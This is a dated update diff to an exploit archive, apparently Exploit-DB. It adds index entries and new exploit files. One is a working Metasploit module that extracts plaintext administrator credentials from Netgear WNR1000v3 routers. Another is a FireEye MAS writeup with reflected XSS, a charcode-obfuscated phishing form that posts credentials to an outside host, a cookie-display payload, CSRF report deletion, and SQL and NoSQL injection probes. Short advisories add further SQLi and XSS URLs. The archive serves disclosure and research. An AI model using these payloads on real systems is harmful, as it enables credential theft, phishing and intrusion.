Updated 07_08_2014

files.csv

@@ -12816,7 +12816,7 @@ id,file,description,date,author,platform,type,port
 14670,platforms/windows/dos/14670.txt,"Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0
 14671,platforms/windows/dos/14671.py,"Brazip 9.0 (.zip File) Buffer Overflow Vulnerability (SEH)",2010-08-17,ITSecTeam,windows,dos,0
 14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion Vulnerability",2010-08-17,Dr.$audi,php,webapps,0
-14673,platforms/windows/local/14673.py,"Triologic Media Player 8 (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0
+14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0
 14674,platforms/windows/remote/14674.txt,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
 14678,platforms/php/dos/14678.zip,"PHP 5.3.3 ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0
@@ -30579,6 +30579,7 @@ id,file,description,date,author,platform,type,port
 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
+33955,platforms/php/webapps/33955.txt,"FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities",2014-07-02,kmkz,php,webapps,0
 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
@@ -30586,6 +30587,7 @@ id,file,description,date,author,platform,type,port
 33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0
 33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0
 33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0
+33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow and Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0
 33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
 33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0
@@ -30598,5 +30600,13 @@ id,file,description,date,author,platform,type,port
 33974,platforms/windows/remote/33974.txt,"Mereo 1.9.1 Directory Traversal Vulnerability",2010-05-09,"John Leitch",windows,remote,0
 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder 'edit_cms.php' Multiple SQL Injection Vulnerabilities",2010-05-11,"High-Tech Bridge SA",php,webapps,0
 33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 'edit.php' Cross Site Scripting Vulnerability",2010-05-11,"High-Tech Bridge SA",php,webapps,0
+33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial Of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0
 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x SQL Injection Vulnerability",2010-05-12,"Russ McRee",php,webapps,0
 33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 pre-release buil 'Ch99.php' Cross Site Scripting Vulnerability",2010-05-19,indoushka,php,webapps,0
+33980,platforms/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",windows,remote,0
+33981,platforms/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow Vulnerability",2010-05-13,"Luigi Auriemma",windows,remote,0
+33982,platforms/php/webapps/33982.txt,"NPDS Revolution 10.02 'download.php' SQL Injection Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
+33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability",2014-07-07,c1ph04,hardware,webapps,0
+33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
+33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
+33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 'signupconfirm.php' Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0

platforms/hardware/webapps/33984.rb

@@ -0,0 +1,91 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Exploit Title: Netgear WNR1000v3 Password Recovery Credential Disclosure Vulnerability
+# Date: 7-5-14
+# Exploit Author: c1ph04
+# Vendor Homepage: http://www.netgear.com/
+# Version: 1.0
+# Tested on: Netgear WNR1000v3 Router Version: <= 1.0.2.62_60.0.87
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+
+      'Name'        => 'Netgear WNR1000v3 Password Extractor',
+
+      'Description' => %q{
+          This module exploits a vulnerability in the password recovery feature of certain Netgear WNR1000v3 routers.
+          Affected devices will allow retrieval of the plaintext administrator credentials.
+          Vulnerable Versions: <= 1.0.2.62_60.0.87
+       },
+
+      'References'  =>
+        [
+          [ 'URL', 'http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html' ],
+          [ 'URL', 'http://packetstormsecurity.com/files/124759/NETGEAR-WNR1000v3-Password-Disclosure.html' ],
+          [ 'URL', 'http://secunia.com/community/advisories/56330' ],
+          [ 'URL', 'http://www.shodanhq.com/search?q=WNR1000v3' ]
+        ],
+
+      'Author'      =>
+        [
+          'c1ph04 <c1ph04mail[at]gmail.com>' # aka - "Ms. Difrank"...idiots
+        ],
+      'License'     => MSF_LICENSE
+    )
+  end
+
+  def run
+
+    print_status("#{rhost}:#{rport} - Attempting to extract credentials...")
+
+    begin
+
+      res = send_request_raw({
+        'uri' => '/',
+        'method' => 'GET'
+        })
+
+      if (res.body =~ /(id)/)
+        uid = res.body.scan(/\d{5,15}/)
+        uid = uid[0]
+        print_good("#{rhost}:#{rport} - UID Retrieved: #{uid}")
+        print_good("#{rhost}:#{rport} - Sending Request...")
+
+      else
+        print_error("Unexpected response...is this a Netgear Router?")
+        return
+
+      end
+
+      res2 = send_request_raw({
+        'uri' => "/passwordrecovered.cgi?id=#{uid}",
+        'method' => 'POST'
+        })
+
+        if (res2.body =~ /(successfully)/)
+          creds = res2.body.scan(/left">(.*)</)
+          user = creds[0]
+          pass = creds[1]
+          print_good("#{rhost}:#{rport} - Username: #{user}")
+          print_good("#{rhost}:#{rport} - Password: #{pass}")
+
+        else
+          print_error("#{rhost}:#{rport} - Failed: Target Not Vulnerable")
+
+        end
+       end
+      end
+
+    rescue ::Rex::ConnectionError
+      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      return
+
+    end

platforms/php/webapps/33955.txt

@@ -0,0 +1,87 @@
+# Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities
+# Google Dork: none
+# Date: 06/05/2014
+# Exploit Author: kmkz (Bourbon Jean-Marie)
+# Vendor Homepage: http://www.fireeye.com/fr/fr/
+# Software Link: http://www.fireeye.com/products-and-solutions/
+# Version: 6.4.1
+# CVE : none
+
+*************************************************************
+*[Audit Type] web IHM ONLY / Full black-box audit 		    *
+*												  		    *
+*[Multiples Vulnerabilities] 					  		    *
+* 												  		    *
+*	3 XSS (reflected)							  		    *
+*	1 CSRF										  		    *
+*	1 NoSQLi (Json object)						  		    *
+*	1 PostGreSQL SQLi (Exploitable?) 			  		    *
+*	1 File and Path Disclosure					  		    *
+*	1 Source code Info-leak								    *
+* 												  		    *
+*************************************************************
+
+
+
+[*] XSS:
+	+First XSS (reflected):
+		https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>
+	PoC :
+		Redirection:
+			https://192.168.1.50/yara/show_ya_file?name=<body
+onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
+		Url encoded redirection payload:
+			https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09
+
+		Phishing page PoC:
+			https://192.168.1.50/yara/show_ya_file?name=<body
+onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
+		Url encoded phishing page payload:
+			https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E
+	+Second XSS (reflected):
+		https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E
+	+Third XSS (reflected):
+		https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
+Show Cookie PoC:
+			https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn
+
+[*] CSRF:
+
+	PoC:
+		admin logout:
+			https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>
+		Url encoded admin deconnexion PoC:
+			https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E
+		Report deleting:
+			https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>
+		Url encoded report deleting Poc:
+			https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E
+[*] SQLi  PostGreSQL (Exploitable?):
+	https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2
+FROM events /**
+
+	output:
+		Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.
+Couldn't find Event with id=9999 OR SELECT 1,2 FROM events
+	https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999	 Output:
+	    Event ID '99999999999' could not be retrieved.
+	    PG::Error: ERROR: value "99999999999" is out of range for type
+integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1
+
+
+[*] Files & Directory Disclosure:
+	https://192.168.1.50/malware_analysis/ma_repo : the Input Path field
+allow Path & file disclosure ../../../../../../../bin/sh (example)
+
+
+{*] Others:
+	1)No SQLi (Json)
+https://192.168.1.50/network/network?new_domain[$ne]=blah
+	Return: {"$ne"=>"blah"} is not a valid host // Exploitable?
+	2)Source code Info-leak:
+		https://192.168.1.50/manual/csc?mode=%3C/script%3E
+
+-- 
+kmkz
+PGP: B24EAF34
+

platforms/php/webapps/33982.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40156/info
+
+NPDS Revolution is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+NPDS Revolution 10.02 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC-- 

platforms/php/webapps/33985.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40157/info
+
+NPDS Revolution is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+NPDS Revolution 10.02 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/viewtopic.php?topic=3"><script>alert(document.cookie)</script>&forum=1

platforms/php/webapps/33986.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40159/info
+
+PHP File Uploader is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately limit the types of files that are uploaded.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. 
+
+http://www.example.com/PHPFileUploader/_uploads/ch99.php__2010-01-02_10.00am.php 

platforms/php/webapps/33987.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40165/info
+
+PHP Banner Exchange is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PHP Banner Exchange 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=<script>alert(213771818860)</script>&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF
+  

platforms/windows/dos/33977.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40102/info
+
+Torque Game Engine is prone to multiple denial-of-service vulnerabilities.
+
+An attacker with valid login credentials can exploit these issues to cause the application using the engine to crash, resulting in a denial-of-service condition. Other attacks may also be possible.
+
+Torque 2D game engine and Torque 3D game engine are vulnerable. 
+
+http://www.exploit-db.com/sploits/33977.zip

platforms/windows/remote/33964.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40008/info
+
+X-Motor Racing is prone to a buffer-overflow vulnerability and a multiple denial-of-service vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code or crash the affected application, denying service to legitimate users.
+
+X-Motor Racing 1.26 is vulnerable; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/33964.zip

platforms/windows/remote/33980.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40145/info
+
+GEM Engine is prone to multiple vulnerabilities including multiple denial-of-service issues and a buffer-overflow issue.
+
+An attacker can exploit these issues to cause applications using the engine to crash, resulting in a denial-of-service condition, or to execute arbitrary code in the context of the vulnerable application. Other attacks may also be possible.
+
+GEM Engine 2 and GEM Engine 3 are vulnerable. 
+
+http://www.exploit-db.com/sploits/33980.zip

platforms/windows/remote/33981.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40155/info
+
+GameCore is prone to a remote integer-overflow vulnerability.
+
+An attacker can exploit this issue to cause a denial-of-service condition.
+
+GameCore 2.5 is vulnerable; other versions may be affected.
+
+http://www.exploit-db.com/sploits/33981.dat